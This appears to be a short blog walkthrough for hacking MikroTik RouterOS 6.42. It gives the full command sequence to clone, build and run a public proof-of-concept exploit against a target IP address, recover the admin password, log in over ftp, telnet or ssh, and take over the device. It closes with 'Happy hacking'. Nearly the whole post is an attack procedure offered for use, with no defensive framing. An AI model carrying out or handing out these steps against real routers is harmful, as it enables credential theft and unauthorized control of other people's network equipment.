Hacking Walkthrough: MicroTik RouterOS - MikroTik 6.42
Exploit : https://www.exploit-db.com/exploits/45578
Goal: all you need to get is the password from this exploit, the username is 'admin'
Do the following:
- git clone https://github.com/tenable/routeros
- cd routeros/poc/bytheway/
- mkdir build
- cd build
- cmake ..
- make
- ./btw -i target-ip
- You will get a the password from the exploit password.
- Connect to the target using ftp/telnet/ssh
- Pwn the device
Happy hacking
Comments
Post a Comment